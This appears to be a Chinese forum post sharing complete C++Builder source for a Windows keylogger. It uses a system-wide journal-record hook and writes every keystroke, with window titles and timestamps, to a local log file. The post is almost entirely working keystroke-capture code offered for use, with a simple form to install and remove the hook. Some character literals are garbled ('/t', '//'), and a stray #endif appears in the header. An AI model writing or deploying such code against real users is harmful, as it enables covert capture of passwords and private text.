日志钩子代码如下,你慢慢品味吧:
//-----------.cpp文件
//---------------------------------------------------------------------------
#include <vcl.h>
#include <stdio.h>
#pragma hdrstop
#include "KeyHookU.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TfrmLogHook *frmLogHook;
HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam);
//钩子变量
HHOOK g_hLogHook=NULL;
//记录上一次得到焦点的窗口句柄
HWND g_hLastFocus=NULL;
//键盘掩码变量
const int KeyPressMask=0x80000000;
//保存上一次按键值
//char g_PrvChar;
//---------------------------------------------------------------------------
__fastcall TfrmLogHook::TfrmLogHook(TComponent* Owner)
: TForm(Owner)
{
}
//---------------------------------------------------------------------------
void __fastcall TfrmLogHook::btnInstallClick(TObject *Sender)
{
if(g_hLogHook==NULL)
//安装日志钩子
g_hLogHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalLogProc,HInstance,0);
}
//---------------------------------------------------------------------------
void __fastcall TfrmLogHook::btnUninstallClick(TObject *Sender)
{
if(g_hLogHook!=NULL)
{
UnhookWindowsHookEx(g_hLogHook);
g_hLogHook=NULL;
}
}
//---------------------------------------------------------------------------
HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam)
{
if(iCode<0)return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam);
if(iCode==HC_ACTION)
{
EVENTMSG* pEvt=(EVENTMSG*)lParam;
int i;
HWND hFocus;//保存当前活动窗口句柄
char szTitle[256];//当前窗口名称
char szTime[128];//当前的日期和时间
FILE* stream=fopen("h://usr//logfile.txt","a+");
if(pEvt->message==WM_KEYDOWN)
{
int vKey=LOBYTE(pEvt->paramL);//取得虚拟键值
char ch;
char str[10];
hFocus=GetActiveWindow();
if(g_hLastFocus!=hFocus)
{
GetWindowText(hFocus,szTitle,256);
g_hLastFocus=hFocus;
strcpy(szTime,DateTimeToStr(Now()).c_str());
fprintf(stream,"%c%s%c%c%s",10,szTime,32,32,szTitle);
fprintf(stream,"%c%c",32,32);
}
int iShift=GetKeyState(0x10);
int iCapital=GetKeyState(0x14);
int iNumLock=GetKeyState(0x90);
bool bShift=(iShift&KeyPressMask)==KeyPressMask;
bool bCapital=(iCapital&1)==1;
bool bNumLock=(iNumLock&1)==1;
/*
if(vKey==9) //TAB
fprintf(stream,"%c",'/t');
if(vKey==13) //回车键
fprintf(stream,"%c",'/n');
*/
if(vKey>=48 && vKey<=57) //数字键0-9
{
if(!bShift)
fprintf(stream,"%c",vKey);
else
{
switch(vKey)
{
case 49:
ch='!';
break;
case 50:
ch='@';
break;
case 51:
ch='#';
break;
case 52:
ch='$';
break;
case 53:
ch='%';
break;
case 54:
ch='^';
break;
case 55:
ch='&';
break;
case 56:
ch='*';
break;
case 57:
ch='(';
break;
case 48:
ch=')';
break;
}
fprintf(stream,"%c",ch);
}
}
if(vKey>=65 && vKey<=90) //A-Z a-z
{
if(!bCapital)
{
if(bShift)
ch=vKey;
else
ch=vKey+32;
}
else if(bShift)
ch=vKey+32;
else
ch=vKey;
fprintf(stream,"%c",ch);
}
if(vKey>=96 && vKey<=105) //小键盘0-9
{
if(bNumLock)
fprintf(stream,"%c",vKey-96+48);
}
if(vKey>=186 && vKey<=222) //其它键
{
switch(vKey)
{
case 186:
if (!bShift) ch=';' ;
else ch=':' ;
break;
case 187:
if (!bShift) ch='=' ;
else ch='+' ;
break;
case 188:
if (!bShift) ch=',' ;
else ch='<' ;
break;
case 189:
if (!bShift) ch='-' ;
else ch='_' ;
break;
case 190:
if (!bShift) ch='.' ;
else ch='>' ;
break;
case 191:
if (!bShift) ch='/' ;
else ch='?' ;
break;
case 192:
if (!bShift) ch='`' ;
else ch='~' ;
break;
case 219:
if (!bShift) ch='[';
else ch='{' ;
break;
case 220:
if (!bShift) ch='//' ;
else ch='|' ;
break;
case 221:
if (!bShift) ch=']';
else ch='}' ;
break;
case 222:
if (!bShift) ch='/'';
else ch='/"' ;
break;
default:
ch='n' ;
break;
}
if (ch!='n' ) fprintf(stream,"%c",ch);
} //
if (vKey>=112 && vKey<=123) // 功能键 [F1]-[F12]
{
switch(wParam)
{
case 112:
fprintf(stream,"%s","[F1]");
break;
case 113:
fprintf(stream,"%s","[F2]");
break;
case 114:
fprintf(stream,"%s","[F3]");
break;
case 115:
fprintf(stream,"%s","[F4]");
break;
case 116:
fprintf(stream,"%s","[F5]");
break;
case 117:
fprintf(stream,"%s","[F6]");
break;
case 118:
fprintf(stream,"%s","[F7]");
break;
case 119:
fprintf(stream,"%s","[F8]");
break;
case 120:
fprintf(stream,"%s","[F9]");
break;
case 121:
fprintf(stream,"%s","[F10]");
break;
case 122:
fprintf(stream,"%s","[F11]");
break;
case 123:
fprintf(stream,"%s","[F12]");
break;
}
}
if (vKey>=8 && vKey<=46) //方向键
{
switch (vKey)
{
case 8:
strcpy(str,"[BK]");
break;
case 9:
strcpy(str,"[TAB]");
break;
case 13:
strcpy(str,"[EN]");
break;
case 27:
strcpy(str,"[ESC]");
break;
case 32:
strcpy(str,"[SP]");
break;
case 33:
strcpy(str,"[PU]");
break;
case 34:
strcpy(str,"[PD]");
break;
case 35:
strcpy(str,"[END]");
break;
case 36:
strcpy(str,"[HOME]");
break;
case 37:
strcpy(str,"[LF]");
break;
case 38:
strcpy(str,"[UF]");
break;
case 39:
strcpy(str,"[RF]");
break;
case 40:
strcpy(str,"[DF]");
break;
case 45:
strcpy(str,"[INS]");
break;
case 46:
strcpy(str,"[DEL]");
break;
default:
ch='n';
break;
}
if (ch!='n' )
{
//if (g_PrvChar!=vKey)
//{
fprintf(stream,"%s",str);
// g_PrvChar=vKey;
//}
}
}
}
if(pEvt->message==WM_LBUTTONDOWN||pEvt->message==WM_RBUTTONDOWN)
{
hFocus=GetActiveWindow();
if(g_hLastFocus!=hFocus)
{
g_hLastFocus=hFocus;
GetWindowText(hFocus,szTitle,256);
strcpy(szTime,DateTimeToStr(Now()).c_str());
fprintf(stream,"%c%s%c%c%s",10,szTime,32,32,szTitle);
fprintf(stream,"%c%c",32,32);
}
}
fclose(stream);
}
return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam);
}
void __fastcall TfrmLogHook::btnExitClick(TObject *Sender)
{
if(g_hLogHook!=NULL)
{
UnhookWindowsHookEx(g_hLogHook);
g_hLogHook=NULL;
}
Close();
}
//-----------.H文件
#include <Classes.hpp>
#include <Controls.hpp>
#include <StdCtrls.hpp>
#include <Forms.hpp>
//---------------------------------------------------------------------------
class TfrmLogHook : public TForm
{
__published: // IDE-managed Components
TButton *btnInstall;
TButton *btnUninstall;
TButton *btnExit;
void __fastcall btnInstallClick(TObject *Sender);
void __fastcall btnUninstallClick(TObject *Sender);
void __fastcall btnExitClick(TObject *Sender);
private: // User declarations
public: // User declarations
__fastcall TfrmLogHook(TComponent* Owner);
};
//---------------------------------------------------------------------------
extern PACKAGE TfrmLogHook *frmLogHook;
//---------------------------------------------------------------------------
#endif
注:在Tfrom上加三个按钮.
|
